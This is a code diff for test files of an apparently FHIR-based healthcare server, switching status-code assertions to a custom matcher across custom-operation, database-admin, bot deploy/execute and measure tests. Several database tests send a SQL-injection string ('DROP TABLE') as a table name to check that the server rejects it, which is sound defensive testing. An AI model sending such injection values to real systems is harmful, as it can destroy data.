@@ -209,7 +209,7 @@ describe('Custom operation', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.FHIR_JSON)
       .send({});
-    expect(resMissing.status).toBe(404);
+    expect(resMissing).toHaveStatus(404);
 
     const res1 = await request(app)
       .post('/fhir/R4/Bot')
@@ -220,7 +220,7 @@ describe('Custom operation', () => {
         name: 'System Custom Operation Bot',
         runtimeVersion: 'vmcontext',
       });
-    expect(res1.status).toBe(201);
+    expect(res1).toHaveStatus(201);
 
     const bot = res1.body as WithId<Bot>;
 
@@ -235,7 +235,7 @@ describe('Custom operation', () => {
           };
           `,
       });
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
 
     const res3 = await request(app)
       .post('/fhir/R4/OperationDefinition')
@@ -266,14 +266,14 @@ describe('Custom operation', () => {
           },
         ],
       });
-    expect(res3.status).toBe(201);
+    expect(res3).toHaveStatus(201);
 
     const res4 = await request(app)
       .post('/fhir/R4/$my-system-operation')
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.FHIR_JSON)
       .send({});
-    expect(res4.status).toBe(200);
+    expect(res4).toHaveStatus(200);
     expect(res4.body).toMatchObject({
       resourceType: 'Parameters',
       parameter: [{ name: 'result', valueString: 'ok' }],
@@ -290,7 +290,7 @@ describe('Custom operation', () => {
         name: 'Custom Operation Bot',
         runtimeVersion: 'vmcontext',
       });
-    expect(res1.status).toBe(201);
+    expect(res1).toHaveStatus(201);
 
     const bot = res1.body as WithId<Bot>;
 
@@ -306,7 +306,7 @@ describe('Custom operation', () => {
           };
           `,
       });
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
 
     const res3 = await request(app)
       .post('/fhir/R4/OperationDefinition')
@@ -344,14 +344,14 @@ describe('Custom operation', () => {
           },
         ],
       });
-    expect(res3.status).toBe(201);
+    expect(res3).toHaveStatus(201);
 
     const res4 = await request(app)
       .post('/fhir/R4/Patient/$my-error-operation')
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.FHIR_JSON)
       .send({ resourceType: 'Patient' });
-    expect(res4.status).toBe(400);
+    expect(res4).toHaveStatus(400);
     expect(res4.body).toMatchObject(badRequest('test'));
   });
 
@@ -365,7 +365,7 @@ describe('Custom operation', () => {
         name: 'Custom Operation Bot',
         runtimeVersion: 'vmcontext',
       });
-    expect(res1.status).toBe(201);
+    expect(res1).toHaveStatus(201);
 
     const bot = res1.body as WithId<Bot>;
 
@@ -381,7 +381,7 @@ describe('Custom operation', () => {
           };
           `,
       });
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
 
     const res3 = await request(app)
       .post('/fhir/R4/OperationDefinition')
@@ -419,14 +419,14 @@ describe('Custom operation', () => {
           },
         ],
       });
-    expect(res3.status).toBe(201);
+    expect(res3).toHaveStatus(201);
 
     const res4 = await request(app)
       .post('/fhir/R4/Patient/$my-return-type-operation')
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.FHIR_JSON)
       .send({ resourceType: 'Patient' });
-    expect(res4.status).toBe(400);
+    expect(res4).toHaveStatus(400);
     expect(res4.body).toMatchObject(badRequest('Expected Patient output, but got unexpected string'));
   });
 
@@ -440,7 +440,7 @@ describe('Custom operation', () => {
         resourceType: 'Patient',
         name: [{ given: ['John'], family: 'Doe' }],
       });
-    expect(patientRes.status).toBe(201);
+    expect(patientRes).toHaveStatus(201);
     const patient = patientRes.body as WithId<Patient>;
 
     // Create a Bot that returns the input it receives
@@ -453,7 +453,7 @@ describe('Custom operation', () => {
         name: 'Instance Operation Bot',
         runtimeVersion: 'vmcontext',
       });
-    expect(res1.status).toBe(201);
+    expect(res1).toHaveStatus(201);
     const bot = res1.body as WithId<Bot>;
 
     const res2 = await request(app)
@@ -467,7 +467,7 @@ describe('Custom operation', () => {
           };
           `,
       });
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
 
     // Create OperationDefinition with instance: true
     const res3 = await request(app)
@@ -499,7 +499,7 @@ describe('Custom operation', () => {
           },
         ],
       });
-    expect(res3.status).toBe(201);
+    expect(res3).toHaveStatus(201);
 
     // Invoke the operation on the specific Patient
     const res4 = await request(app)
@@ -507,7 +507,7 @@ describe('Custom operation', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.FHIR_JSON)
       .send({});
-    expect(res4.status).toBe(200);
+    expect(res4).toHaveStatus(200);
     expect(res4.body.resourceType).toBe('Patient');
     expect(res4.body.id).toBe(patient.id);
     expect(res4.body.name).toMatchObject([{ given: ['John'], family: 'Doe' }]);
@@ -519,7 +519,7 @@ describe('Custom operation', () => {
       .set('Content-Type', ContentType.FHIR_JSON)
       .set('Authorization', 'Bearer ' + accessToken)
       .send({ resourceType: 'Bot', name: 'Echo Bot', runtimeVersion: 'vmcontext' });
-    expect(res1.status).toBe(201);
+    expect(res1).toHaveStatus(201);
     const bot = res1.body as WithId<Bot>;
 
     await request(app)
@@ -555,7 +555,7 @@ describe('Custom operation', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.FHIR_JSON)
       .send({});
-    expect(res.status).toBe(404);
+    expect(res).toHaveStatus(404);
   });
 
   test('GET request on instance-level operation loads resource as input', async () => {
@@ -564,7 +564,7 @@ describe('Custom operation', () => {
       .set('Content-Type', ContentType.FHIR_JSON)
       .set('Authorization', 'Bearer ' + accessToken)
       .send({ resourceType: 'Patient', name: [{ given: ['Jane'], family: 'Smith' }] });
-    expect(patientRes.status).toBe(201);
+    expect(patientRes).toHaveStatus(201);
     const patient = patientRes.body as WithId<Patient>;
 
     const res1 = await request(app)
@@ -572,7 +572,7 @@ describe('Custom operation', () => {
       .set('Content-Type', ContentType.FHIR_JSON)
       .set('Authorization', 'Bearer ' + accessToken)
       .send({ resourceType: 'Bot', name: 'GET Instance Bot', runtimeVersion: 'vmcontext' });
-    expect(res1.status).toBe(201);
+    expect(res1).toHaveStatus(201);
     const bot = res1.body as WithId<Bot>;
 
     await request(app)
@@ -607,7 +607,7 @@ describe('Custom operation', () => {
     const res = await request(app)
       .get(`/fhir/R4/Patient/${patient.id}/$my-get-instance-operation`)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.body.resourceType).toBe('Patient');
     expect(res.body.id).toBe(patient.id);
     expect(res.body.name).toMatchObject([{ given: ['Jane'], family: 'Smith' }]);
@@ -620,7 +620,7 @@ describe('Custom operation', () => {
       .set('Content-Type', ContentType.FHIR_JSON)
       .set('Authorization', 'Bearer ' + accessToken)
       .send({ resourceType: 'Patient', name: [{ given: ['Bob'], family: 'Jones' }] });
-    expect(patientRes.status).toBe(201);
+    expect(patientRes).toHaveStatus(201);
     const patient = patientRes.body as WithId<Patient>;
 
     const res1 = await request(app)
@@ -628,7 +628,7 @@ describe('Custom operation', () => {
       .set('Content-Type', ContentType.FHIR_JSON)
       .set('Authorization', 'Bearer ' + accessToken)
       .send({ resourceType: 'Bot', name: 'Type Level Bot', runtimeVersion: 'vmcontext' });
-    expect(res1.status).toBe(201);
+    expect(res1).toHaveStatus(201);
     const bot = res1.body as WithId<Bot>;
 
     await request(app)
@@ -666,7 +666,7 @@ describe('Custom operation', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.FHIR_JSON)
       .send(bodyPatient);
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     // Bot received the request body (not the DB Patient), so family should be 'FromBody' not 'Jones'
     expect(res.body.resourceType).toBe('Patient');
     expect(res.body.name).toMatchObject([{ family: 'FromBody' }]);

--- a/packages/server/src/fhir/operations/db-column-statistics.test.ts
+++ b/packages/server/src/fhir/operations/db-column-statistics.test.ts
@@ -32,7 +32,7 @@ describe('getColumnStatisticsHandler', () => {
       .get('/fhir/R4/$db-column-statistics?tableName=')
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.FHIR_JSON);
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.body).toMatchObject({
       resourceType: 'Parameters',
       parameter: [
@@ -49,7 +49,7 @@ describe('getColumnStatisticsHandler', () => {
       .get('/fhir/R4/$db-column-statistics?tableName=Patient')
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.FHIR_JSON);
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.body).toMatchObject({
       resourceType: 'Parameters',
       parameter: [
@@ -93,7 +93,7 @@ describe('getColumnStatisticsHandler', () => {
         .get(`/fhir/R4/$db-column-statistics?tableName=${tableName}`)
         .set('Authorization', 'Bearer ' + accessToken)
         .set('Content-Type', ContentType.FHIR_JSON);
-      expect(res.status).toBe(200);
+      expect(res).toHaveStatus(200);
       expect(res.body).toMatchObject({
         resourceType: 'Parameters',
         parameter: [
@@ -126,7 +126,7 @@ describe('getColumnStatisticsHandler', () => {
       .get(`/fhir/R4/$db-column-statistics?tableName=${encodeURIComponent('Robert"; DROP TABLE Students;')}`)
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.FHIR_JSON);
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body).toMatchObject({
       resourceType: 'OperationOutcome',
       issue: [

--- a/packages/server/src/fhir/operations/db-configure-column-statistics.test.ts
+++ b/packages/server/src/fhir/operations/db-configure-column-statistics.test.ts
@@ -35,7 +35,7 @@ describe('dbcolumnstatisticsupdate', () => {
         resetToDefault: false,
         newStatisticsTarget: 100,
       });
-    expect(res1.status).toBe(200);
+    expect(res1).toHaveStatus(200);
     expect(res1.body).toMatchObject(allOk);
 
     const res2 = await request(app)
@@ -48,7 +48,7 @@ describe('dbcolumnstatisticsupdate', () => {
         resetToDefault: true,
         newStatisticsTarget: undefined,
       });
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
     expect(res1.body).toMatchObject(allOk);
   });
 
@@ -59,7 +59,7 @@ describe('dbcolumnstatisticsupdate', () => {
         .set('Authorization', 'Bearer ' + accessToken)
         .set('Content-Type', ContentType.FHIR_JSON)
         .send({});
-      expect(res1.status).toBe(400);
+      expect(res1).toHaveStatus(400);
       expect(res1.body).toMatchObject({
         resourceType: 'OperationOutcome',
         issue: [
@@ -78,7 +78,7 @@ describe('dbcolumnstatisticsupdate', () => {
         .set('Authorization', 'Bearer ' + accessToken)
         .set('Content-Type', ContentType.FHIR_JSON)
         .send({ tableName: 'AccessPolicy', columnNames: [] });
-      expect(res2.status).toBe(400);
+      expect(res2).toHaveStatus(400);
       expect(res2.body).toMatchObject({
         resourceType: 'OperationOutcome',
         issue: [
@@ -97,7 +97,7 @@ describe('dbcolumnstatisticsupdate', () => {
         .set('Authorization', 'Bearer ' + accessToken)
         .set('Content-Type', ContentType.FHIR_JSON)
         .send({ tableName: 'AccessPolicy', columnNames: ['id'] });
-      expect(res3.status).toBe(400);
+      expect(res3).toHaveStatus(400);
       expect(res3.body).toMatchObject({
         resourceType: 'OperationOutcome',
         issue: [
@@ -116,7 +116,7 @@ describe('dbcolumnstatisticsupdate', () => {
         .set('Authorization', 'Bearer ' + accessToken)
         .set('Content-Type', ContentType.FHIR_JSON)
         .send({ tableName: 'Robert"; DROP TABLE Students;', columnNames: ['id'], resetToDefault: true });
-      expect(res1.status).toBe(400);
+      expect(res1).toHaveStatus(400);
       expect(res1.body).toMatchObject({
         resourceType: 'OperationOutcome',
         issue: [
@@ -135,7 +135,7 @@ describe('dbcolumnstatisticsupdate', () => {
         .set('Authorization', 'Bearer ' + accessToken)
         .set('Content-Type', ContentType.FHIR_JSON)
         .send({ tableName: 'AccessPolicy', columnNames: ['id', 'invalid-column-name'], resetToDefault: true });
-      expect(res.status).toBe(400);
+      expect(res).toHaveStatus(400);
       expect(res.body).toMatchObject({
         resourceType: 'OperationOutcome',
         issue: [
@@ -154,7 +154,7 @@ describe('dbcolumnstatisticsupdate', () => {
         .set('Authorization', 'Bearer ' + accessToken)
         .set('Content-Type', ContentType.FHIR_JSON)
         .send({ tableName: 'AccessPolicy', columnNames: ['id'], resetToDefault: true, newStatisticsTarget: 100 });
-      expect(res.status).toBe(400);
+      expect(res).toHaveStatus(400);
       expect(res.body).toMatchObject({
         resourceType: 'OperationOutcome',
         issue: [
@@ -173,7 +173,7 @@ describe('dbcolumnstatisticsupdate', () => {
         .set('Authorization', 'Bearer ' + accessToken)
         .set('Content-Type', ContentType.FHIR_JSON)
         .send({ tableName: 'AccessPolicy', columnNames: ['id'], resetToDefault: false });
-      expect(res.status).toBe(400);
+      expect(res).toHaveStatus(400);
       expect(res.body).toMatchObject({
         resourceType: 'OperationOutcome',
         issue: [
@@ -192,7 +192,7 @@ describe('dbcolumnstatisticsupdate', () => {
         .set('Authorization', 'Bearer ' + accessToken)
         .set('Content-Type', ContentType.FHIR_JSON)
         .send({ tableName: 'AccessPolicy', columnNames: ['id'], resetToDefault: false, newStatisticsTarget: -1 });
-      expect(res.status).toBe(400);
+      expect(res).toHaveStatus(400);
       expect(res.body).toMatchObject({
         resourceType: 'OperationOutcome',
         issue: [

--- a/packages/server/src/fhir/operations/db-configure-indexes.test.ts
+++ b/packages/server/src/fhir/operations/db-configure-indexes.test.ts
@@ -50,7 +50,7 @@ describe('db-configure-indexes', () => {
           },
         ],
       });
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body).toMatchObject({
       resourceType: 'OperationOutcome',
       issue: [
@@ -78,7 +78,7 @@ describe('db-configure-indexes', () => {
           },
         ],
       });
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body).toMatchObject({
       resourceType: 'OperationOutcome',
       issue: [
@@ -106,7 +106,7 @@ describe('db-configure-indexes', () => {
           },
         ],
       });
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body).toMatchObject({
       resourceType: 'OperationOutcome',
       issue: [
@@ -150,7 +150,7 @@ describe('db-configure-indexes', () => {
           },
         ],
       });
-    expect(res.status).toBe(202);
+    expect(res).toHaveStatus(202);
 
     const asyncJob = await waitForAsyncJob(res.headers['content-location'], app, accessToken);
 
@@ -208,7 +208,7 @@ describe('db-configure-indexes', () => {
           },
         ],
       });
-    expect(res.status).toBe(202);
+    expect(res).toHaveStatus(202);
 
     const asyncJob = await waitForAsyncJob(res.headers['content-location'], app, accessToken);
 
@@ -287,7 +287,7 @@ describe('db-configure-indexes', () => {
           },
         ],
       });
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body).toMatchObject({
       resourceType: 'OperationOutcome',
       issue: [

--- a/packages/server/src/fhir/operations/dbindexes.test.ts
+++ b/packages/server/src/fhir/operations/dbindexes.test.ts
@@ -44,7 +44,7 @@ describe('dbgetginindexes', () => {
       .get('/fhir/R4/$db-indexes?tableName=')
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.FHIR_JSON);
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.body).toMatchObject({
       resourceType: 'Parameters',
       parameter: [
@@ -61,7 +61,7 @@ describe('dbgetginindexes', () => {
       .get(`/fhir/R4/$db-indexes?tableName=${tableName}`)
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.FHIR_JSON);
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.body).toMatchObject({
       resourceType: 'Parameters',
       parameter: expect.arrayContaining([
@@ -97,7 +97,7 @@ describe('dbgetginindexes', () => {
       .get(`/fhir/R4/$db-indexes?tableName=${encodeURIComponent('Robert"; DROP TABLE Students;')}`)
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.FHIR_JSON);
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.body).toMatchObject({
       resourceType: 'OperationOutcome',
       issue: [

--- a/packages/server/src/fhir/operations/dbinvalidindexes.test.ts
+++ b/packages/server/src/fhir/operations/dbinvalidindexes.test.ts
@@ -40,7 +40,7 @@ describe('$db-invalid-indexes', () => {
       .post('/fhir/R4/$db-invalid-indexes')
       .set('Authorization', 'Bearer ' + accessToken)
       .send({});
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     const params = res.body as Parameters;
     const invalidIndex = params.parameter?.find(
       (p) => p.name === 'invalidIndex' && p.valueString?.startsWith('"CarePlan_replaces_idx"')

--- a/packages/server/src/fhir/operations/dbschemadiff.test.ts
+++ b/packages/server/src/fhir/operations/dbschemadiff.test.ts
@@ -33,7 +33,7 @@ describe('$db-schema-diff', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.FHIR_JSON)
       .send({});
-    expect(res1.status).toBe(200);
+    expect(res1).toHaveStatus(200);
     const params = res1.body as Parameters;
     const migrationString = params.parameter?.find((p) => p.name === 'migrationString')?.valueString;
     expect(migrationString).toBeDefined();
@@ -48,6 +48,6 @@ describe('$db-schema-diff', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.FHIR_JSON)
       .send({});
-    expect(res1.status).toBe(403);
+    expect(res1).toHaveStatus(403);
   });
 });

--- a/packages/server/src/fhir/operations/dbstats.test.ts
+++ b/packages/server/src/fhir/operations/dbstats.test.ts
@@ -28,7 +28,7 @@ describe('$db-stats', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.FHIR_JSON)
       .send({});
-    expect(res1.status).toBe(200);
+    expect(res1).toHaveStatus(200);
   });
 
   test('Success - Specified table names', async () => {
@@ -42,7 +42,7 @@ describe('$db-stats', () => {
         resourceType: 'Parameters',
         parameter: [{ name: 'tableNames', valueString: 'Observation,Observation_History' }],
       } satisfies Parameters);
-    expect(res1.status).toBe(200);
+    expect(res1).toHaveStatus(200);
   });
 
   test('Access denied', async () => {
@@ -53,6 +53,6 @@ describe('$db-stats', () => {
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.FHIR_JSON)
       .send({});
-    expect(res1.status).toBe(403);
+    expect(res1).toHaveStatus(403);
   });
 });

--- a/packages/server/src/fhir/operations/deploy.test.ts
+++ b/packages/server/src/fhir/operations/deploy.test.ts
@@ -99,7 +99,7 @@ describe('Deploy', () => {
         resourceType: 'Binary',
         contentType: ContentType.JAVASCRIPT,
       } satisfies Binary);
-    expect(res1.status).toBe(201);
+    expect(res1).toHaveStatus(201);
 
     const binary = res1.body as Binary;
 
@@ -112,7 +112,7 @@ describe('Deploy', () => {
         name: 'Test Bot',
         runtimeVersion: 'awslambda',
       });
-    expect(res2.status).toBe(201);
+    expect(res2).toHaveStatus(201);
 
     const bot = res2.body as Bot;
 
@@ -125,14 +125,14 @@ describe('Deploy', () => {
         ...bot,
         executableCode: { url: `Binary/${binary.id}` },
       });
-    expect(res2b.status).toBe(200);
+    expect(res2b).toHaveStatus(200);
 
     // Step 4: Deploy the bot
     const res3 = await request(app)
       .post(`/fhir/R4/Bot/${bot.id}/$deploy`)
       .set('Content-Type', ContentType.FHIR_JSON)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res3.status).toBe(200);
+    expect(res3).toHaveStatus(200);
 
     expect(readBinarySpy).toHaveBeenCalledWith(
       expect.objectContaining({
@@ -169,7 +169,7 @@ describe('Deploy', () => {
         name: 'Test Bot',
         runtimeVersion: 'awslambda',
       });
-    expect(res1.status).toBe(201);
+    expect(res1).toHaveStatus(201);
 
     const bot = res1.body as Bot;
 
@@ -181,7 +181,7 @@ describe('Deploy', () => {
       .send({
         code,
       });
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
     expect(deployMocks.deployLambda).toHaveBeenCalledWith(
       expect.objectContaining({
         resourceType: 'Bot',
@@ -210,7 +210,7 @@ describe('Deploy', () => {
         }
         `,
       });
-    expect(res1.status).toBe(201);
+    expect(res1).toHaveStatus(201);
 
     const bot = res1.body as Bot;
 
@@ -220,7 +220,7 @@ describe('Deploy', () => {
       .set('Content-Type', ContentType.FHIR_JSON)
       .set('Authorization', 'Bearer ' + accessToken)
       .send({ code: '' });
-    expect(res2.status).toBe(400);
+    expect(res2).toHaveStatus(400);
     expect(res2.body.issue[0].details.text).toStrictEqual('Bot missing executable code');
   });
 
@@ -243,7 +243,7 @@ describe('Deploy', () => {
         runtimeVersion: 'awslambda',
         code,
       });
-    expect(res1.status).toBe(201);
+    expect(res1).toHaveStatus(201);
 
     const bot = res1.body as Bot;
 
@@ -253,7 +253,7 @@ describe('Deploy', () => {
       .set('Content-Type', ContentType.FHIR_JSON)
       .set('Authorization', 'Bearer ' + accessToken)
       .send({ code });
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
     expect(deployMocks.deployLambda).toHaveBeenCalled();
 
     // Verify the response includes both the OK status and the warning
@@ -285,7 +285,7 @@ describe('Deploy', () => {
         runAsUser: true,
         code,
       });
-    expect(res1.status).toBe(201);
+    expect(res1).toHaveStatus(201);
 
     const bot = res1.body as Bot;
 
@@ -297,7 +297,7 @@ describe('Deploy', () => {
       .send({
         code,
       });
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
     expect(deployMocks.deployLambda).toHaveBeenCalled();
 
     // Verify no warning is returned since runAsUser bypasses the ProjectMembership check
@@ -327,7 +327,7 @@ describe('Deploy', () => {
         name: 'Alice personal bot',
         description: 'Alice bot description',
       });
-    expect(res2.status).toBe(201);
+    expect(res2).toHaveStatus(201);
     expect(res2.body.resourceType).toBe('Bot');
     expect(res2.body.id).toBeDefined();
     expect(res2.body.sourceCode).toBeDefined();
@@ -346,7 +346,7 @@ describe('Deploy', () => {
         }
         `,
       });
-    expect(res3.status).toBe(400);
+    expect(res3).toHaveStatus(400);
     expect(res3.body.issue[0].details.text).toStrictEqual('Bots not enabled');
   });
 });

--- a/packages/server/src/fhir/operations/evaluatemeasure.test.ts
+++ b/packages/server/src/fhir/operations/evaluatemeasure.test.ts
@@ -39,7 +39,7 @@ describe('Measure evaluate-measure', () => {
           active: true,
           gender: i % 2 === 0 ? 'male' : 'female',
         });
-      expect(patientResponse.status).toBe(201);
+      expect(patientResponse).toHaveStatus(201);
     }
 
     // 1. Create a Measure
@@ -72,7 +72,7 @@ describe('Measure evaluate-measure', () => {
           },
         ],
       });
-    expect(res1.status).toBe(201);
+    expect(res1).toHaveStatus(201);
 
     // 2. Invoke $evaluate-measure
     const res2 = await request(app)
@@ -92,7 +92,7 @@ describe('Measure evaluate-measure', () => {
           },
         ],
       });
-    expect(res2.status).toBe(201);
+    expect(res2).toHaveStatus(201);
     expect(res2.body.resourceType).toBe('MeasureReport');
     expect(res2.body.group?.[0].population).toHaveLength(2);
     expect(res2.body.group?.[0].population?.[0].count).toStrictEqual(10);
@@ -102,7 +102,7 @@ describe('Measure evaluate-measure', () => {
     const res3 = await request(app)
       .get(`/fhir/R4/MeasureReport/${res2.body.id}`)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res3.status).toBe(200);
+    expect(res3).toHaveStatus(200);
     expect(res3.body.resourceType).toBe('MeasureReport');
     expect(res3.body.group?.[0].population).toHaveLength(2);
     expect(res3.body.group?.[0].population?.[0].count).toStrictEqual(10);
@@ -118,14 +118,14 @@ describe('Measure evaluate-measure', () => {
         resourceType: 'Measure',
         status: 'active',
       });
-    expect(res1.status).toBe(201);
+    expect(res1).toHaveStatus(201);
 
     const res2 = await request(app)
       .post(`/fhir/R4/Measure/${res1.body.id}/$evaluate-measure`)
       .set('Authorization', 'Bearer ' + accessToken)
       .set('Content-Type', ContentType.TEXT)
       .send('hello');
-    expect(res2.status).toBe(400);
+    expect(res2).toHaveStatus(400);
     expect((res2.body as OperationOutcome).issue?.[0]?.details?.text).toStrictEqual(
       "Expected at least 1 value(s) for required input parameter 'periodStart'"
     );
@@ -140,7 +140,7 @@ describe('Measure evaluate-measure', () => {
         resourceType: 'Measure',
         status: 'active',
       });
-    expect(res1.status).toBe(201);
+    expect(res1).toHaveStatus(201);
 
     const res2 = await request(app)
       .post(`/fhir/R4/Measure/${res1.body.id}/$evaluate-measure`)
@@ -149,7 +149,7 @@ describe('Measure evaluate-measure', () => {
       .send({
         resourceType: 'Patient',
       });
-    expect(res2.status).toBe(400);
+    expect(res2).toHaveStatus(400);
     expect((res2.body as OperationOutcome).issue?.[0]?.details?.text).toStrictEqual(
       "Expected at least 1 value(s) for required input parameter 'periodStart'"
     );
@@ -164,7 +164,7 @@ describe('Measure evaluate-measure', () => {
         resourceType: 'Measure',
         status: 'active',
       });
-    expect(res1.status).toBe(201);
+    expect(res1).toHaveStatus(201);
 
     const res2 = await request(app)
       .post(`/fhir/R4/Measure/${res1.body.id}/$evaluate-measure`)
@@ -179,7 +179,7 @@ describe('Measure evaluate-measure', () => {
           },
         ],
       });
-    expect(res2.status).toBe(400);
+    expect(res2).toHaveStatus(400);
     expect((res2.body as OperationOutcome).issue?.[0]?.details?.text).toStrictEqual(
       'Expected 1 value(s) for input parameter periodStart, but 0 provided'
     );
@@ -197,7 +197,7 @@ describe('Measure evaluate-measure', () => {
           },
         ],
       });
-    expect(res3.status).toBe(400);
+    expect(res3).toHaveStatus(400);
     expect((res3.body as OperationOutcome).issue?.[0]?.details?.text).toStrictEqual(
       'Expected 1 value(s) for input parameter periodEnd, but 0 provided'
     );

--- a/packages/server/src/fhir/operations/execute.test.ts
+++ b/packages/server/src/fhir/operations/execute.test.ts
@@ -197,7 +197,7 @@ describe('Execute', () => {
           ...(streaming && { streamingEnabled: true }),
         });
 
-      expect(res1.status).toBe(201);
+      expect(res1).toHaveStatus(201);
       const bot = res1.body as WithId<Bot>;
 
       const res2 = await request(app)
@@ -208,7 +208,7 @@ describe('Execute', () => {
           code: cjsCode,
         });
 
-      expect(res2.status).toBe(200);
+      expect(res2).toHaveStatus(200);
 
       return bot;
     }
@@ -228,7 +228,7 @@ describe('Execute', () => {
       .set('Content-Type', ContentType.TEXT)
       .set('Authorization', 'Bearer ' + accessToken1)
       .send('input');
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.headers['content-type']).toBe('text/plain; charset=utf-8');
     expect(res.text).toStrictEqual('input');
   });
@@ -242,7 +242,7 @@ describe('Execute', () => {
         name: [{ given: ['John'], family: ['Doe'] }],
         identifier: [],
       });
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.headers['content-type']).toBe('application/json; charset=utf-8');
     expect(res.body.identifier).toStrictEqual([]);
   });
@@ -255,7 +255,7 @@ describe('Execute', () => {
         name: [{ given: ['John'], family: ['Doe'] }],
         identifier: [],
       });
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.headers['content-type']).toBe('application/json; charset=utf-8');
     expect(res.body.identifier).toStrictEqual([]);
   });
@@ -266,7 +266,7 @@ describe('Execute', () => {
       .post(`/fhir/R4/Bot/${bots.systemEchoBot.id}/$execute`)
       .set('Authorization', 'Bearer ' + accessToken1)
       .send(JSON.parse(JSON.stringify(input)));
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.headers['content-type']).toBe('application/json; charset=utf-8');
     expect(res.body).toStrictEqual({ type: 'not-a-resource', result: [] });
   });
@@ -284,7 +284,7 @@ describe('Execute', () => {
       .set('Content-Type', ContentType.HL7_V2)
       .set('Authorization', 'Bearer ' + accessToken1)
       .send(text);
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.headers['content-type']).toBe('x-application/hl7-v2+er7; charset=utf-8');
     expect(writeFileSpy).toHaveBeenCalledTimes(1);
 
@@ -310,7 +310,7 @@ describe('Execute', () => {
         name: 'Test Bot',
         code: '',
       });
-    expect(res1.status).toBe(201);
+    expect(res1).toHaveStatus(201);
     const bot = res1.body as Bot;
 
     // Execute the bot
@@ -319,7 +319,7 @@ describe('Execute', () => {
       .set('Content-Type', ContentType.FHIR_JSON)
       .set('Authorization', 'Bearer ' + accessToken1)
       .send({});
-    expect(res2.status).toBe(400);
+    expect(res2).toHaveStatus(400);
   });
 
   test('Unsupported runtime version', async () => {
@@ -332,7 +332,7 @@ describe('Execute', () => {
         name: 'Test Bot',
         runtimeVersion: 'unsupported',
       });
-    expect(res1.status).toBe(201);
+    expect(res1).toHaveStatus(201);
     const bot = res1.body as Bot;
 
     // Step 2: Publish the bot
@@ -348,7 +348,7 @@ describe('Execute', () => {
         }
         `,
       });
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
 
     // Step 3: Execute the bot
     const res3 = await request(app)
@@ -356,7 +356,7 @@ describe('Execute', () => {
       .set('Content-Type', ContentType.FHIR_JSON)
       .set('Authorization', 'Bearer ' + accessToken1)
       .send({});
-    expect(res3.status).toBe(400);
+    expect(res3).toHaveStatus(400);
   });
 
   test('Bots not enabled', async () => {
@@ -380,7 +380,7 @@ describe('Execute', () => {
         name: 'Alice personal bot',
         description: 'Alice bot description',
       });
-    expect(res2.status).toBe(201);
+    expect(res2).toHaveStatus(201);
     expect(res2.body.resourceType).toBe('Bot');
     expect(res2.body.id).toBeDefined();
     expect(res2.body.sourceCode).toBeDefined();
@@ -392,7 +392,7 @@ describe('Execute', () => {
       .set('Content-Type', ContentType.FHIR_JSON)
       .set('Authorization', 'Bearer ' + accessToken)
       .send({});
-    expect(res3.status).toBe(400);
+    expect(res3).toHaveStatus(400);
     expect(res3.body.issue[0].details.text).toStrictEqual('Bots not enabled');
   });
 
@@ -408,7 +408,7 @@ describe('Execute', () => {
         runtimeVersion: 'vmcontext',
         runAsUser: true,
       });
-    expect(res1.status).toBe(201);
+    expect(res1).toHaveStatus(201);
     const bot = res1.body as Bot;
 
     // Try to execute before deploying
